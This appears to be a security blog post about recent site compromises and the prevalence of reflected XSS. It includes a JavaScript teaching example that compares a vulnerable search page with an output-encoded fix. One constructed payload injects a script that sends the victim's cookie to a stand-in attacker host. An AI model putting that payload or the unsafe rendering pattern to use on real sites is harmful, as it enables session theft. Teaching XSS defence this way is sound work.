A pretty big issue, resolved fairly quickly by the host removing the offending source, but our comfort level with that site is shaky now. How did the attackers get in, and did they close the hole or just put some silly putty over it? We may never know.
The CDC's podcast site! They've since taken their system down for repairs.
The dv521.com site has been removed as well, but how many people already had their machines trojaned?
There are a lot of XSS bugs out there. Michael Sutton ran a large-scale check and found that 47 of 272 sites (17.3%) had an XSS vulnerability. The XSS Wall of Shame at the sla.ckers.org forum never stops growing, and most of the entries are non-persistent (reflected) XSS, where the payload rides in the link the victim clicks rather than being stored on the site.
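To make the "non-persistent" distinction concrete, here is an added example (written for this post, not code from any of the sites or researchers mentioned) of a reflected XSS bug in a hypothetical search page and the same page with output encoding. The page path, the `q` parameter, the attacker host and the payload are all assumptions for illustration; nothing is stored server-side, the payload exists only in the URL.

```javascript
// Added example, not from the original post: a reflected ("non-persistent")
// XSS bug in an assumed /search?q= page, beside the same page with output
// encoding. Parameter name, hosts and payload are constructed for illustration.

// Minimal HTML entity encoding for text placed inside an element body or a
// double-quoted attribute. These five characters are the ones that can
// break out of those two contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Pull the search term out of the request URL the way a server-side handler
// would. This string is fully attacker-controlled: it is the reflected input.
function getQuery(requestUrl) {
  const url = new URL(requestUrl, "https://example.invalid");
  return url.searchParams.get("q") || "";
}

// Vulnerable: the query is echoed straight into the HTML response, both in
// element text and inside a quoted attribute.
function renderSearchUnsafe(requestUrl) {
  const q = getQuery(requestUrl);
  return `<h1>Results for: ${q}</h1>\n<input name="q" value="${q}">`;
}

// Fixed: every interpolation is encoded for the HTML context it lands in.
function renderSearchSafe(requestUrl) {
  const q = escapeHtml(getQuery(requestUrl));
  return `<h1>Results for: ${q}</h1>\n<input name="q" value="${q}">`;
}

// True when the rendered page still contains a live <script> tag, i.e. the
// payload survived rendering and would execute in the victim's browser.
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker link: closes the value attribute, then injects a script
// that ships the victim's cookie to an assumed attacker-controlled host.
const ATTACK_URL =
  "/search?q=" +
  encodeURIComponent(
    '"><script>document.location="https://attacker.invalid/?c="+document.cookie</script>'
  );

// Stand-alone demonstration: the unsafe page carries the script, the safe one
// shows it as harmless text.
console.log("unsafe:\n" + renderSearchUnsafe(ATTACK_URL));
console.log("safe:\n" + renderSearchSafe(ATTACK_URL));
```

The whole attack lives in `ATTACK_URL`; the server keeps nothing, which is why reflected bugs are so common on the Wall of Shame and why a site can look clean to a crawler that never sends the payload. Encoding at the point of output, for the specific context (element body versus attribute), is the fix; a blacklist of `<script>` alone would not help against an attribute breakout with an event handler.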
Some very good resources on XSS and the very real threats it poses: